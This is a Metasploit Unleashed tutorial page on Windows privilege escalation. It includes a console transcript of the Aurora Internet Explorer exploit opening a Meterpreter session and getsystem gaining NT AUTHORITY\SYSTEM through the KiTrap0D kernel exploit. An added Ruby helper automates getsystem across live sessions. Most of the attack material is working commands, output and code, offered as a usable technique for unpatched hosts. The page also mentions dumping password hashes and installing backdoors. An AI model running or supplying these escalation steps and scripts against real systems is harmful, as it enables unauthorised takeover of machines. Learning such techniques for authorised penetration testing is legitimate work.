Privilege Escalation
From Metasploit Unleashed
Frequently, especially with client-side exploits, you will find that your session only has limited user rights. This severely limits what you can do on the remote system: dumping password hashes, manipulating the registry, installing backdoors and similar tasks all need higher privileges. Fortunately, Meterpreter provides a 'getsystem' command (part of the 'priv' extension) that tries a number of different techniques, one after another, to elevate the session to NT AUTHORITY\SYSTEM.
Using the infamous 'Aurora' Internet Explorer exploit (ms10_002_aurora), we see that our Meterpreter session is only running as a regular user account.
msf exploit(ms10_002_aurora) >
[*] Sending Internet Explorer "Aurora" Memory Corruption to client 192.168.1.161
[*] Sending stage (748544 bytes) to 192.168.1.161
[*] Meterpreter session 3 opened (192.168.1.71:38699 -> 192.168.1.161:4444) at 2010-08-21 13:39:10 -0600

msf exploit(ms10_002_aurora) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: XEN-XP-SP2-BARE\victim
meterpreter >
To make use of the 'getsystem' command, we first need to load the 'priv' extension (current Metasploit versions load it automatically on Windows sessions, so 'use priv' is only needed on older releases). Running getsystem with the "-h" switch displays the available techniques. Note the labels: techniques 1 to 3 are marked "Admin" because they create a service or duplicate a privileged token and therefore only work if the session already runs as a local administrator; technique 4 is marked "User" because it exploits a kernel bug (KiTrap0D, MS10-015) and works from an unprivileged account, but only on hosts that have not been patched.
meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem -h
Usage: getsystem [options]

Attempt to elevate your privilege to that of local system.

OPTIONS:

    -h        Help Banner.
    -t        The technique to use. (Default to '0').
                0 : All techniques available
                1 : Service - Named Pipe Impersonation (In Memory/Admin)
                2 : Service - Named Pipe Impersonation (Dropper/Admin)
                3 : Service - Token Duplication (In Memory/Admin)
                4 : Exploit - KiTrap0D (In Memory/User)
We will let Metasploit do the heavy lifting for us and run getsystem without any options (technique 0). The command attempts every technique in order and stops at the first one that succeeds. Within the blink of an eye our session is running with SYSTEM privileges; because the victim was an unprivileged user on an unpatched Windows XP SP2 box, it was the KiTrap0D exploit (technique 4) that worked, not the service-based methods. Always confirm the result with 'getuid' rather than trusting the success message alone. If every technique fails, the session is typically a non-administrative user on a patched host, and a separate local exploit or UAC bypass is needed before getsystem can succeed.
meterpreter > getsystem
...got system (via technique 4).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
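The getuid / getsystem / getuid sequence above can be scripted so it runs the same way against every session. The helper below is an added example written for this page; it is not code from Metasploit Unleashed or from the Metasploit project. It uses the Meterpreter Ruby client calls that the console commands map to (session.sys.config.getuid for 'getuid', session.core.use('priv') for 'use priv', session.priv.getsystem(n) for 'getsystem -t n'), tries the techniques one at a time so that it can report which ones failed, and re-reads the user after each attempt instead of trusting the return value. The FakeSession class is a constructed stand-in for a live session so the helper can be exercised offline; it models the page's host, an unprivileged user where only technique 4 succeeds.

```ruby
# Added example: automate getuid -> getsystem -> getuid with the Meterpreter
# client API. Not part of Metasploit; FakeSession below is a constructed stub.
module GetSystemHelper
  # Technique numbers and names as listed by `getsystem -h` on the page.
  TECHNIQUES = {
    1 => 'Service - Named Pipe Impersonation (In Memory/Admin)',
    2 => 'Service - Named Pipe Impersonation (Dropper/Admin)',
    3 => 'Service - Token Duplication (In Memory/Admin)',
    4 => 'Exploit - KiTrap0D (In Memory/User)'
  }.freeze
  SYSTEM_USER = 'NT AUTHORITY\\SYSTEM'.freeze

  # Equivalent of the `getuid` console command.
  def self.current_user(session)
    session.sys.config.getuid
  end

  def self.system?(session)
    current_user(session).casecmp?(SYSTEM_USER)
  end

  # Tries each technique like `getsystem -t N` and verifies with getuid.
  # Returns { ok:, technique:, user:, errors: { n => message } }.
  def self.elevate(session, techniques: TECHNIQUES.keys)
    errors = {}
    return { ok: true, technique: nil, user: current_user(session), errors: errors } if system?(session)

    # `use priv`: the extension adds a `priv` method to the session once loaded.
    session.core.use('priv') unless session.respond_to?(:priv)

    techniques.each do |t|
      begin
        session.priv.getsystem(t) # raises (RequestError on a real session) on failure
      rescue => e
        errors[t] = e.message
        next
      end
      return { ok: true, technique: t, user: current_user(session), errors: errors } if system?(session)
      errors[t] = 'getsystem returned but getuid is still not SYSTEM'
    end
    { ok: false, technique: nil, user: current_user(session), errors: errors }
  end
end

# Constructed stub of a Meterpreter session (not a real Rex client). `working`
# lists the technique numbers that succeed on this pretend host.
class FakeSession
  Config = Struct.new(:session) { def getuid; session.user; end }
  Sys    = Struct.new(:session) { def config; FakeSession::Config.new(session); end }
  Priv   = Struct.new(:session) do
    def getsystem(technique)
      raise "priv_elevate_getsystem: Operation failed: Access is denied." unless session.working.include?(technique)
      session.user = GetSystemHelper::SYSTEM_USER
      [true, technique]
    end
  end
  Core = Struct.new(:session) do
    def use(ext)
      session.loaded << ext
      s = session
      s.define_singleton_method(:priv) { FakeSession::Priv.new(s) } if ext == 'priv'
      true
    end
  end

  attr_accessor :user
  attr_reader :working, :loaded

  def initialize(user:, working:)
    @user, @working, @loaded = user, working, []
  end

  def sys;  Sys.new(self);  end
  def core; Core.new(self); end
end

if __FILE__ == $0
  # Mirrors the page: regular user on an unpatched XP SP2 host, KiTrap0D works.
  victim = FakeSession.new(user: 'XEN-XP-SP2-BARE\\victim', working: [4])
  result = GetSystemHelper.elevate(victim)
  puts "ok=#{result[:ok]} technique=#{result[:technique]} user=#{result[:user]}"
  result[:errors].each { |t, msg| puts "  technique #{t} failed: #{msg}" }
end
```

Inside an msfconsole resource script the same helper runs against live sessions from a <ruby> block, where the framework object is available, for example by looping over framework.sessions and calling GetSystemHelper.elevate on each Meterpreter session; on a patched host every technique fails and the errors hash tells you which ones were tried.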
